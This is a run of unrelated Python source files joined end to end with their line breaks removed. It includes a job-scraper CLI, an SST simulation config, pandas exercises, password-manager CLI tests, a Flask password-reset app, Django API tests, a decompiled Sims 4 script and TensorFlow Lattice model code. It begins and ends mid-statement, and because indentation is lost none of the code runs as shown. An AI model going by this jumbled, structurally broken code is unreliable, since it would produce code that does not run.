str(my_seed) random.seed(my_seed) np.random.seed(my_seed) tf.random.set_seed(my_seed) tf.config.threading.set_intra_op_parallelism_threads(1) tf.config.threading.set_inter_op_parallelism_threads(1) Henrique-GM/Exercicios_de_Python numero = int(input('Digite um número inteiro: ')) contador = 0 for i in range(1, numero + 1): if numero % i == 0: contador += 1 if contador == 2: print('E primo') else: print('Não é primo') import jobui class JobSpider: def __init__(self): print("\n欢迎使用JobSpider,所有职位信息来自职友集!") def __del__(self): pass def run(self): # 实现主要逻辑 while True: choice = self.get_choice() if choice == 'query': # 查询职位信息 self.action_query() elif choice == 'exit': # 退出程序 exit() else: print("无效的指令!") # 查询职位信息 def action_query(self): print("查询职位信息,请输入有关参数:") job = input("职位名称(如'少儿编程'):").strip() city = input("城市名称(如'广州'):").strip() maxpagenum = int(input("最大爬取页数(0表示无限制):").strip()) print("\n") result = jobui.query(job, city, maxpagenum) print("\n") if result['state'] == 'success': print("统计信息({}个职位):".format(result['result']['quantity'])) print("\n") print("\t职位:{} 城市:{}".format(job, city)) print("\t" + "*" * 75 + "\n") # 分隔符 # 薪资 print("\t\t\t\t\t薪资分析") salary = [] salary.append(result['result']['salary']['avg']) salary.append(result['result']['salary']['0-5k']) salary.append(result['result']['salary']['5-10k']) salary.append(result['result']['salary']['10-20k']) salary.append(result['result']['salary']['20k+']) print("\t\t平均:{} 0-5k:{} 5-10k:{} 10-20k:{} 20k+:{}".format(salary[0], salary[1], salary[2], salary[3], salary[4])) # 学历 print("\n\t\t\t\t\t最低学历") education = [] education.append(result['result']['education']['大专']) education.append(result['result']['education']['本科']) education.append(result['result']['education']['硕士']) print("\t\t\t\t大专:{} 本科:{} 硕士:{}".format(education[0], education[1], education[2])) print("\n\t" + "*" * 75) # 分隔符 # 清洗率 salary = result['result']['salary']['rate'] education = result['result']['education']['rate'] print("\t清洗率:薪资 {} 学历 {}".format(salary, education)) print("\n") else: print("查询职位信息失败,错误信息:{} {}".format(result['error']['position'], result['error']['message'])) print("\n") # 获得用户输入 def get_choice(self): self.show_menu() choice = input("\t\t请输入指令:").strip() print("\n") return choice # 显示功能菜单 def show_menu(self): print("\n\t\t\t\t功能菜单") print("\t\t" + "=" * 50 + "\n") # 功能列表 print("\t\t\t 1. 查询职位信息 【 query 】") print("\t\t\t 2. 退出程序 【 exit 】") print("\n\t\t" + "=" * 50) print("\t\t\t 【】中的内容为指令\n") job_spider = JobSpider() job_spider.run() # Automatically generated SST Python input import sst from mhlib import componentlist DEBUG_L1 = 0 DEBUG_MEM = 0 DEBUG_CORE = 0 DEBUG_NIC = 0 DEBUG_LEVEL = 10 debug_params = { "debug" : 0, "debug_level" : 10 } # On network: Core, L1, MMIO device, memory # Logical communication: Core->L1->memory # Core->MMIO # MMIO->memory core_group = 0 l1_group = 1 mmio_group = 2 memory_group = 3 core_dst = [l1_group, mmio_group] l1_src = [core_group] l1_dst = [memory_group] mmio_src = [core_group] mmio_dst = [memory_group] memory_src = [l1_group,mmio_group] # Constans shared across components network_bw = "25GB/s" clock = "2GHz" mmio_addr = 1024 # Define the simulation components cpu = sst.Component("cpu", "memHierarchy.standardCPU") cpu.addParams({ "opCount" : "1000", "memFreq" : "4", "memSize" : "1KiB", "mmio_freq" : 15, "mmio_addr" : mmio_addr, # Just above memory addresses "clock" : clock, "verbose" : 3, }) iface = cpu.setSubComponent("memory", "memHierarchy.standardInterface") iface.addParams(debug_params) cpu_nic = iface.setSubComponent("memlink", "memHierarchy.MemNIC") cpu_nic.addParams({"group" : core_group, "destinations" : core_dst, "network_bw" : network_bw}) #cpu_nic.addParams(debug_params) l1cache = sst.Component("l1cache", "memHierarchy.Cache") l1cache.addParams({ "access_latency_cycles" : "2", "cache_frequency" : clock, "replacement_policy" : "lru", "coherence_protocol" : "MSI", "associativity" : "4", "cache_line_size" : "64", "cache_size" : "2 KB", "L1" : "1", "addr_range_start" : 0, "addr_range_end" : mmio_addr - 1, "debug" : DEBUG_L1, "debug_level" : DEBUG_LEVEL }) l1_nic = l1cache.setSubComponent("cpulink", "memHierarchy.MemNIC") l1_nic.addParams({ "group" : l1_group, "sources" : l1_src, "destinations" : l1_dst, "network_bw" : network_bw}) #l1_nic.addParams(debug_params) mmio = sst.Component("mmio", "memHierarchy.mmioEx") mmio.addParams({ "verbose" : 3, "clock" : clock, "base_addr" : mmio_addr, }) mmio_iface = mmio.setSubComponent("iface", "memHierarchy.standardInterface") #mmio_iface.addParams(debug_params) mmio_nic = mmio_iface.setSubComponent("memlink", "memHierarchy.MemNIC") mmio_nic.addParams({"group" : mmio_group, "sources" : mmio_src, "destinations" : mmio_dst, "network_bw" : network_bw }) #mmio_nic.addParams(debug_params) chiprtr = sst.Component("chiprtr", "merlin.hr_router") chiprtr.addParams({ "xbar_bw" : "1GB/s", "id" : "0", "input_buf_size" : "1KB", "num_ports" : "4", "flit_size" : "72B", "output_buf_size" : "1KB", "link_bw" : "1GB/s", "topology" : "merlin.singlerouter" }) chiprtr.setSubComponent("topology","merlin.singlerouter") memctrl = sst.Component("memory", "memHierarchy.MemController") memctrl.addParams({ "debug" : DEBUG_MEM, "debug_level" : DEBUG_LEVEL, "clock" : "1GHz", "addr_range_end" : mmio_addr - 1, }) mem_nic = memctrl.setSubComponent("cpulink", "memHierarchy.MemNIC") mem_nic.addParams({"group" : memory_group, "sources" : "[1,2]", # Group 1 = L1, Group 2 = MMIO "network_bw" : network_bw}) #mem_nic.addParams(debug_params) memory = memctrl.setSubComponent("backend", "memHierarchy.simpleMem") memory.addParams({ "access_time" : "100 ns", "mem_size" : "512MiB" }) # Enable statistics sst.setStatisticLoadLevel(7) sst.setStatisticOutput("sst.statOutputConsole") for a in componentlist: sst.enableAllStatisticsForComponentType(a) # Define the simulation links # cpu/cpu_nic # | # l1/l1_nic - chiprtr - mem_nic/mem # link_cpu_rtr = sst.Link("link_cpu") link_cpu_rtr.connect( (cpu_nic, "port", "1000ps"), (chiprtr, "port0", "1000ps") ) link_l1_rtr = sst.Link("link_l1") link_l1_rtr.connect( (l1_nic, "port", '1000ps'), (chiprtr, "port1", "1000ps") ) link_mmio_rtr = sst.Link("link_mmio") link_mmio_rtr.connect( (mmio_nic, "port", "500ps"), (chiprtr, "port2", "500ps")) link_mem_rtr = sst.Link("link_mem") link_mem_rtr.connect( (mem_nic, "port", "1000ps"), (chiprtr, "port3", "1000ps") ) 0 # -------------- #Header files import pandas as pd import numpy as np import matplotlib.pyplot as plt #path of the data file- path data=pd.read_csv(path) #Code starts here data['Gender'].replace('-','Agender',inplace=True) gender_count=data.Gender.value_counts() gender_count.plot(kind='Bar') # -------------- #Code starts here alignment=data.Alignment.value_counts() alignment.plot(kind='Bar') plt.xlabel('Character Alignment') # -------------- #Code starts here sc_df=data[['Strength','Combat']] sc_covariance=sc_df.cov().iloc[1,0].round(2) sc_strength=sc_df.Strength.std().round(2) sc_combat=sc_df.Combat.std().round(2) sc_pearson=(sc_covariance/(sc_strength*sc_combat)).round(2) ic_df=data[['Intelligence','Combat']] ic_covariance=ic_df.cov().iloc[1,0].round(2) ic_intelligence=ic_df.Intelligence.std().round(2) ic_combat=ic_df.Combat.std().round(2) ic_pearson=(ic_covariance/(ic_intelligence*ic_combat)).round(2) # -------------- #Code starts here total_high=data.Total.quantile(q=0.99) print(total_high) super_best=data[data['Total']>total_high] super_best_names=list(super_best['Name']) print(super_best_names) # -------------- #Code starts here fig,([ax_1,ax_2,ax_3])=plt.subplots(1,3,figsize=(10,15)) data['Intelligence'].plot(kind='box', ax=ax_1, legend=True) data['Speed'].plot(kind='box', ax=ax_2, legend=True) data['Power'].plot(kind='box', ax=ax_3, legend=True) #ax_1.set_xlabels('Intelligence') #ax_2=plt.boxplot(data.Speed) #ax_2.set_xlabels('Speed') #ax_3=plt.boxplot(data.Power) #ax_3.set_xlabels('Power') # -*- coding: utf-8 -*- from __future__ import unicode_literals import os import json import subprocess import ruamel.yaml from face import CommandChecker from pocket_protector import cli def test_prepare(): # confirms that all subcommands compile together nicely assert cli._get_cmd(prepare=True) return KURT_EMAIL = '' KURT_PHRASE = u'' MH_EMAIL = '' MH_PHRASE = 'thegame' DOMAIN_NAME = 'first-domain' SECRET_NAME = 'secret-name' SECRET_VALUE = u'secrët-value' # _fast_crypto from conftest def test_cli(tmp_path, _fast_crypto): cmd = cli._get_cmd() cc = CommandChecker(cmd, reraise=True) assert cc.run('pprotect version').stdout.startswith('pocket_protector version') tmp_path = str(tmp_path) protected_path = tmp_path + '/protected.yaml' # fail init and ensure that file isn't created cc.fail_1('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE + 'nope']) assert not os.path.exists(protected_path) # successfully create protected res = cc.run('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE]) assert res.stdout == 'Adding new key custodian.\nUser email: ' assert res.stderr == 'Passphrase: Retype passphrase: ' # check we can only create it once res = cc.fail_2('pprotect init --file %s' % protected_path, input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE]) file_data = ruamel.yaml.YAML().load(open(protected_path).read()) assert list(file_data['key-custodians'])[0] == KURT_EMAIL assert len(file_data['audit-log']) == 2 res = cc.run('pprotect list-audit-log --file %s' % protected_path) audit_lines = res.stdout.splitlines() assert len(audit_lines) == 2 assert 'created' in audit_lines[0] # make a new cc, with env and tmp_path baked in (also tests # protected.yaml in the cur dir being the default file) kurt_env = {'PPROTECT_USER': KURT_EMAIL, 'PPROTECT_PASSPHRASE': KURT_PHRASE} cc = CommandChecker(cmd, chdir=tmp_path, env=kurt_env, reraise=True) res = cc.run(['pprotect', 'add-domain'], input=[DOMAIN_NAME]) assert 'Adding new domain.' in res.stdout res = cc.run(['pprotect', 'list_domains']) assert res.stdout.splitlines() == [DOMAIN_NAME] cc.run(['pprotect', 'add-secret'], input=[DOMAIN_NAME, SECRET_NAME, 'tmpval']) cc.run(['pprotect', 'update-secret'], input=[DOMAIN_NAME, SECRET_NAME, SECRET_VALUE]) res = cc.run(['pprotect', 'list-domain-secrets', DOMAIN_NAME]) assert res.stdout == SECRET_NAME + '\n' res = cc.run(['pprotect', 'decrypt-domain', DOMAIN_NAME]) res_data = json.loads(res.stdout) assert res_data[SECRET_NAME] == SECRET_VALUE cc.fail(['pprotect', 'decrypt-domain', 'nonexistent-domain']) # already exists cc.fail_1('pprotect add-key-custodian', input=[KURT_EMAIL, '']) cc.run('pprotect add-key-custodian', input=[MH_EMAIL, MH_PHRASE, MH_PHRASE]) cc.run('pprotect add-owner', input=[DOMAIN_NAME, MH_EMAIL]) # missing protected cc.fail_2('pprotect list-all-secrets', chdir=tmp_path + '/..') res = cc.run('pprotect list-all-secrets') assert '{}: {}\n'.format(SECRET_NAME, DOMAIN_NAME) == res.stdout cc.run(['pprotect', 'rotate_domain_keys'], input=[DOMAIN_NAME]) # test mixed env var and entry res = cc.run(['pprotect', 'decrypt-domain', DOMAIN_NAME], env={'PPROTECT_USER': MH_EMAIL, 'PPROTECT_PASSPHRASE': None}, input=[MH_PHRASE]) assert json.loads(res.stdout)[SECRET_NAME] == SECRET_VALUE assert 'Verify passphrase' in res.stderr # test bad creds cc.fail_1(['pprotect', 'decrypt-domain', DOMAIN_NAME], env={'PPROTECT_USER': None, 'PPROTECT_PASSPHRASE': 'nope'}, input=[KURT_EMAIL]) res = cc.fail_1('pprotect set-key-custodian-passphrase', input=[KURT_EMAIL, KURT_PHRASE, KURT_PHRASE, KURT_PHRASE + 'nope']) assert 'did not match' in res.stderr # correctly reset passphrase new_kurt_phrase = KURT_PHRASE + '' res = cc.run('pprotect set-key-custodian-passphrase', input=[KURT_EMAIL, KURT_PHRASE, new_kurt_phrase, new_kurt_phrase]) # try new passphrase with a passphrase file why not ppfile_path = str(tmp_path) + 'tmp_passphrase' with open(ppfile_path, 'wb') as f: f.write(new_kurt_phrase.encode('utf8')) res = cc.run(['pprotect', 'decrypt-domain', '--non-interactive', '--passphrase-file', ppfile_path, DOMAIN_NAME]) res_data = json.loads(res.stdout) assert res_data[SECRET_NAME] == SECRET_VALUE # test mutual exclusivity of check env and interactive cc.fail_2(['pprotect', 'decrypt-domain', '--non-interactive', '--ignore-env', DOMAIN_NAME]) res = cc.fail_1('pprotect decrypt-domain --non-interactive ' + DOMAIN_NAME, env={'PPROTECT_PASSPHRASE': None}) assert 'Warning: Empty passphrase' in res.stderr # print(open(protected_path).read()) # test removals cc.run(['pprotect', 'rm-owner'], input=[DOMAIN_NAME, MH_EMAIL]) cc.run(['pprotect', 'rm-secret'], input=[DOMAIN_NAME, SECRET_NAME]) cc.run(['pprotect', 'rm-domain', '--confirm'], input=[DOMAIN_NAME, 'y']) def test_main(tmp_path): # TODO: pytest-cov knows how to make coverage work across # subprocess boundaries... os.chdir(str(tmp_path)) res = subprocess.check_output(['pprotect', 'version']) assert res.decode('utf8').startswith('pocket_protector version') res = subprocess.check_output(['pocket_protector', 'version']) assert res.decode('utf8').startswith('pocket_protector version') setup.py #!/usr/bin/env python from setuptools import setup version = "0.0.1" setup( name='numpylint', version=version, description='Linter for numeric python code', author='', author_email='', url='http://github.com/perimosocordiae/numpylint', license='MIT', classifiers=[ 'Development Status :: 4 - Beta', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', ], packages=['numpylint'], install_requires=['rope'], scripts=[ 'numpylint/numpylinter.py', ] ) #!/usr/bin/env python3 # -*- coding:utf-8 -*- """ @project: passreset @component: core @copyright: © 2020 by vfabi @author: vfabi @support: vfabi @initial date: 2020-05-08 21:08:07 @license: this file is subject to the terms and conditions defined in file 'LICENSE', which is part of this source code package @description: @todo: """ import os import logging from flask import Flask, render_template, flash, redirect, url_for, request from application.core.forms import PasswdResetForm, PasswdChangeForm from application.core.models import ResetLinkModel from application.core.utils import variables, CustomCaptcha, SecurityHandler, mailer, backend captcha = CustomCaptcha(config={'SECRET_CSRF_KEY': variables['FLASK_SIMPLE_CAPTCHA_SECRET_CSRF_KEY']}) app = Flask(__name__, template_folder=os.path.abspath('application/templates'), static_folder='application/static') app.config['SECRET_KEY'] = variables['FLASK_SECRET_KEY'] app = captcha.init_app(app) app.jinja_env.globals.update(variables=variables) app.logger.handlers[0].setFormatter(logging.Formatter("%(asctime)s [%(name)s] %(levelname)s %(message)s")) security_handler = SecurityHandler(app.logger) resetlink_storage = ResetLinkModel() @app.route("/", methods=['GET', 'POST']) @app.route("/reset", methods=['GET', 'POST']) def reset(): form = PasswdResetForm() if form.validate_on_submit(): try: # check captcha captcha_hash = request.form.get('captcha-hash') captcha_text = request.form.get('captcha_text') if not captcha.verify(captcha_text, captcha_hash): security_handler.process(message='Invalid captcha.', ipaddress=request.remote_addr, level='warning') flash(f'Captcha is not valid. Please try again.', 'warning') return redirect(url_for('reset')) # check email exists in user database if backend.check_exists(form.email.data): resetlink_string = resetlink_storage.generate() resetlink_url = f'{request.url_root}resetlink/{resetlink_string}/' resetlink_storage.add(resetlink_string, form.email.data) mailer.sendmail(resetlink_url, form.email.data) security_handler.process(message=f'Resetlink sent to {form.email.data}.', ipaddress=request.remote_addr, level='info') flash(f'Password reset link sent to {form.email.data}.', 'success') return redirect(url_for('reset')) else: security_handler.process(message=f'Email {form.email.data} was not found in user registry.', ipaddress=request.remote_addr, level='warning') flash(f'Email {form.email.data} was not found in user registry', 'warning') return redirect("reset") except Exception as e: security_handler.process(message=f'Exception: {e}.', ipaddress=request.remote_addr, level='error') flash(f'Internal error. Details: {e}.', 'danger') return render_template('blank.html', title='Error') return render_template('reset.html', title=variables['page_title'], form=form, captcha=captcha.create()) @app.route('/resetlink//', methods=['GET', 'POST']) def article(resetlink): if resetlink_storage.exists(resetlink): form = PasswdChangeForm() if form.validate_on_submit(): try: email = resetlink_storage.get(resetlink) backend.change_password(email, form.new_password.data) resetlink_storage.delete(resetlink) security_handler.process(message=f'Password for {email} was changed.', ipaddress=request.remote_addr, level='info') flash('Your password was successfully changed.', 'success') return render_template('blank.html', title='Success') except Exception as e: security_handler.process(message=f'Exception: {e}.', ipaddress=request.remote_addr, level='error') flash(f'Internal error. Details: {e}.', 'danger') return render_template('blank.html', title='Error') return render_template('resetlink_ok.html', title=variables['page_title'], form=form) security_handler.process(message='Incorrect link or your link expaired.', ipaddress=request.remote_addr, level='warning') flash('Incorrect link or your link expaired.', 'warning') return render_template('blank.html', title='Warning'), 403 @app.errorhandler(404) def page_not_found(e): security_handler.process(message='404 Page not found.', ipaddress=request.remote_addr, level='warning') return render_template('404.html', title='Error 404'), 404 if __name__ == "__main__": app.run( debug=False, host='0.0.0.0', port=8000 ) shubhi-raft/TANF-app """API Tests.""" from django.contrib.auth import get_user_model import pytest from rest_framework import status User = get_user_model() @pytest.mark.django_db def test_retrieve_user(api_client, user): """Test user retrieval.""" response = api_client.get(f"/v1/users/{user.pk}/") assert response.status_code == status.HTTP_200_OK assert response.data["username"] == user.username @pytest.mark.django_db def test_can_update_own_user(api_client, user): """Test a user can update their own user.""" api_client.login(username=user.username, password="") response = api_client.patch(f"/v1/users/{user.pk}/", {"first_name": "Jane"}) assert response.status_code == status.HTTP_200_OK assert response.data["first_name"] == "Jane" assert User.objects.filter(first_name="Jane").exists() @pytest.mark.django_db def test_cannot_update_user_anonymously(api_client, user): """Test an unauthenticated user cannot update a user.""" response = api_client.patch(f"/v1/users/{user.pk}/", {"first_name": "Jane"}) assert response.status_code == status.HTTP_403_FORBIDDEN @pytest.mark.django_db def test_create_user(api_client, user_data): """Test user creation.""" response = api_client.post("/v1/users/", user_data) assert response.status_code == status.HTTP_201_CREATED assert User.objects.filter(username=user_data["username"]).exists() @pytest.mark.django_db def test_set_profile_data(api_client, user): """Test profile data can be set.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Joe", "last_name": "Bloggs"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Joe", "last_name": "Bloggs"} user.refresh_from_db() assert user.first_name == "Joe" assert user.last_name == "Bloggs" @pytest.mark.django_db def test_set_profile_data_last_name_apostrophe(api_client, user): """Test profile data last name can be set with an apostrophe.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Mike", "last_name": "O'Hare"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Mike", "last_name": "O'Hare"} user.refresh_from_db() assert user.first_name == "Mike" assert user.last_name == "O'Hare" @pytest.mark.django_db def test_set_profile_data_first_name_apostrophe(api_client, user): """Test profile data first name can be set with an apostrophe.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Pat'Jack", "last_name": "Smith"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Pat'Jack", "last_name": "Smith"} user.refresh_from_db() assert user.first_name == "Pat'Jack" assert user.last_name == "Smith" @pytest.mark.django_db def test_set_profile_data_empty_first_name(api_client, user): """Test profile data cannot be be set if first name is blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": "Jones"}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_empty_last_name(api_client, user): """Test profile data cannot be set last name is blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John", "last_name": ""}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_empty_first_name_and_last_name(api_client, user): """Test profile data cannot be set if first and last name are blank.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": ""}, ) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_special_last_name(api_client, user): """Test profile data can be set if last name has multipe special characters.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John", "last_name": "Smith-O'Hare"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "John", "last_name": "Smith-O'Hare"} user.refresh_from_db() assert user.first_name == "John" assert user.last_name == "Smith-O'Hare" @pytest.mark.django_db def test_set_profile_data_special_first_name(api_client, user): """Test profile data can be set if first name has multiple special characters.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "John-Tom'", "last_name": "Jacobs"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "John-Tom'", "last_name": "Jacobs"} user.refresh_from_db() assert user.first_name == "John-Tom'" assert user.last_name == "Jacobs" @pytest.mark.django_db def test_set_profile_data_spaced_last_name(api_client, user): """Test profile data can be set if last name has a space.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Joan", "last_name": ""}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Joan", "last_name": ""} user.refresh_from_db() assert user.first_name == "Joan" assert user.last_name == "" @pytest.mark.django_db def test_set_profile_data_spaced_first_name(api_client, user): """Test profile data can be set if first name has a space.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "", "last_name": "Smith"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "", "last_name": "Smith"} user.refresh_from_db() assert user.first_name == "" assert user.last_name == "Smith" @pytest.mark.django_db def test_set_profile_data_last_name_with_tilde_over_char(api_client, user): """Test profile data can be set if last name includes a tilde character.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Max", "last_name": "Grecheñ"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Max", "last_name": "Grecheñ"} user.refresh_from_db() assert user.first_name == "Max" assert user.last_name == "Grecheñ" @pytest.mark.django_db def test_set_profile_data_last_name_with_tilde(api_client, user): """Test profile data can be set if last name includes alternate tilde character.""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", {"first_name": "Max", "last_name": "Glen~"}, ) assert response.status_code == status.HTTP_200_OK assert response.data == {"first_name": "Max", "last_name": "Glen~"} user.refresh_from_db() assert user.first_name == "Max" assert user.last_name == "Glen~" @pytest.mark.django_db def test_set_profile_data_extra_field_include_required(api_client, user): """Test profile data will ignore any extra fields passed in via request body.""" with pytest.raises(AttributeError): """This test will fail if it does not trigger an AttributeError exception""" api_client.login(username=user.username, password="") response = api_client.post( "/v1/users/set_profile/", { "first_name": "Heather", "last_name": "Class", "middle_initial": "Unknown", }, ) assert response.status_code == status.HTTP_200_OK """Test to ensure response data does not include unknown field""" assert response.data == {"first_name": "Heather", "last_name": "Class"} user.refresh_from_db() assert user.first_name == "Heather" assert user.last_name == "Class" """Test fails if AttributeError exception isn't thrown""" assert user.middle_name == "Unknown" @pytest.mark.django_db def test_set_profile_data_missing_last_name_field(api_client, user): """Test profile data cannot be set if last name field is missing.""" api_client.login(username=user.username, password="") response = api_client.post("/v1/users/set_profile/", {"first_name": "Heather", },) assert response.status_code == status.HTTP_400_BAD_REQUEST @pytest.mark.django_db def test_set_profile_data_missing_first_name_field(api_client, user): """Test profile data cannot be set if first name field is missing.""" api_client.login(username=user.username, password="") response = api_client.post("/v1/users/set_profile/", {"last_name": "Heather", },) assert response.status_code == status.HTTP_400_BAD_REQUEST velocist/TS4CheatsInfo0 # uncompyle6 version 3.7.4 # Python bytecode 3.7 (3394) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)] # Embedded file name: T:\InGame\Gameplay\Scripts\Server\socials\interrogation_group.py # Compiled at: 2014-11-14 04:09:48 # Size of source mod 2**32: 6613 bytes from protocolbuffers import UI_pb2, DistributorOps_pb2 from distributor.ops import GenericProtocolBufferOp from distributor.system import Distributor from interactions.context import InteractionContext from interactions.priority import Priority from sims4.tuning.tunable import TunableReference, TunableThreshold, TunableTuple from socials.group import SocialGroup import enum, services, sims4 class InterrogationUpdateType(enum.Int, export=False): TYPE_START = 0 TYPE_UPDATE = 1 TYPE_STOP = 2 class InterrogationGroup(SocialGroup): INSTANCE_TUNABLES = {'interrogation_statistic':TunableReference(description='\n Statistic to listen to display on the interrogation\n progress.\n ', manager=services.get_instance_manager(sims4.resources.Types.STATISTIC)), 'interrogation_end_interaction_data':TunableTuple(description='\n Tunable information corresponding at the interaction that \n will be pushed when the interrogation is done. \n All these tunables are required.\n ', interrogation_statistic_threshold=TunableThreshold(description='\n The threshold that the interrogation stat value will be\n compared to. If the threshold returns true then the\n interrogation end interaction will be pushed from the interrogation\n actor to its interrogation target.\n '), interrogation_end_interaction=TunableReference(description='\n The affordance to push on from the officer (Actor of interaction)\n to the suspect (TargetSim of interaction).\n ', manager=(services.affordance_manager())))} def __init__(self, *args, **kwargs): self._interrogation_callback = None (super().__init__)(*args, **kwargs) def pre_add(self, *_, **__): stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) stat_tracker.add_statistic(self.interrogation_statistic) op = self._get_interrogation_op(InterrogationUpdateType.TYPE_START) Distributor.instance().add_op(self._initiating_sim, op) def _interrogation_statistic_callback(self, stat_type, old_value, new_value): if self.interrogation_statistic is not stat_type: return op = self._get_interrogation_op(InterrogationUpdateType.TYPE_UPDATE) Distributor.instance().add_op(self._initiating_sim, op) if self._initiating_sim is not None: if self._target_sim is not None: if self.interrogation_end_interaction_data.interrogation_statistic_threshold.compare(new_value): context = InteractionContext(self._initiating_sim, InteractionContext.SOURCE_SCRIPT, Priority.High) self._initiating_sim.push_super_affordance(self.interrogation_end_interaction_data.interrogation_end_interaction, self._target_sim, context) def _get_interrogation_op(self, msg_type): if self._target_sim is None or self._initiating_sim is None: return if self._interrogation_callback is None: self._initialize_interrogate_group() stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) stat_instance = stat_tracker.get_statistic(self.interrogation_statistic) if stat_instance is None: decay_rate = 0 stat_value = 0 else: decay_rate = stat_instance.get_change_rate() stat_value = stat_instance._value interrogation_update = UI_pb2.InterrogationProgressUpdate() interrogation_update.type = msg_type interrogation_update.target_id = self._target_sim.id interrogation_update.value = stat_value interrogation_update.decay_rate = decay_rate return GenericProtocolBufferOp(DistributorOps_pb2.Operation.INTERROGATION_PROGRESS_UPDATE, interrogation_update) def _initialize_interrogate_group(self): stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) if self._interrogation_callback is None: self._interrogation_callback = stat_tracker.add_watcher(self._interrogation_statistic_callback) def shutdown(self, finishing_type): if self._initiating_sim: stat_tracker = self._initiating_sim.get_tracker(self.interrogation_statistic) if stat_tracker.has_watcher(self._interrogation_callback): stat_tracker.remove_watcher(self._interrogation_callback) op = self._get_interrogation_op(InterrogationUpdateType.TYPE_STOP) Distributor.instance().add_op(self._initiating_sim, op) super().shutdown(finishing_type)# Copyright 2019 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Implementation of algorithms required for premade models.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import copy import enum import itertools from . import aggregation_layer from . import categorical_calibration_layer from . import configs from . import kronecker_factored_lattice_layer as kfll from . import kronecker_factored_lattice_lib as kfl_lib from . import lattice_layer from . import lattice_lib from . import linear_layer from . import pwl_calibration_layer from . import rtl_layer from . import utils from absl import logging import numpy as np import six import tensorflow as tf # Layer names used for layers in the premade models. AGGREGATION_LAYER_NAME = 'tfl_aggregation' CALIB_LAYER_NAME = 'tfl_calib' INPUT_LAYER_NAME = 'tfl_input' KFL_LAYER_NAME = 'tfl_kronecker_factored_lattice' LATTICE_LAYER_NAME = 'tfl_lattice' LINEAR_LAYER_NAME = 'tfl_linear' OUTPUT_LINEAR_COMBINATION_LAYER_NAME = 'tfl_output_linear_combination' OUTPUT_CALIB_LAYER_NAME = 'tfl_output_calib' RTL_LAYER_NAME = 'tfl_rtl' RTL_INPUT_NAME = 'tfl_rtl_input' # Prefix for passthrough (identity) nodes for shared calibration. # These nodes pass shared calibrated values to submodels in an ensemble. CALIB_PASSTHROUGH_NAME = 'tfl_calib_passthrough' # Prefix for defining feature calibrator regularizers. _INPUT_CALIB_REGULARIZER_PREFIX = 'calib_' # Prefix for defining output calibrator regularizers. _OUTPUT_CALIB_REGULARIZER_PREFIX = 'output_calib_' # Weight of laplacian in feature importance for the crystal algorithm. _LAPLACIAN_WEIGHT_IN_IMPORTANCE = 6.0 # Discount amount for repeated co-occurrence of pairs of features in crystals. _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE = 0.5 # Maximum number of swaps for the crystals algorithm. _MAX_CRYSTALS_SWAPS = 1000 def _input_calibration_regularizers(model_config, feature_config): """Returns pwl layer regularizers defined in the model and feature configs.""" regularizer_configs = [] regularizer_configs.extend(feature_config.regularizer_configs or []) regularizer_configs.extend(model_config.regularizer_configs or []) return [(r.name.replace(_INPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in regularizer_configs if r.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX)] def _middle_calibration_regularizers(model_config): """Returns pwl layer regularizers defined in the model config.""" regularizer_configs = [] regularizer_configs.extend(model_config.regularizer_configs or []) return [(r.name.replace(_INPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in regularizer_configs if r.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX)] def _output_calibration_regularizers(model_config): """Returns output calibration regularizers defined in the model config.""" return [(r.name.replace(_OUTPUT_CALIB_REGULARIZER_PREFIX, ''), r.l1, r.l2) for r in 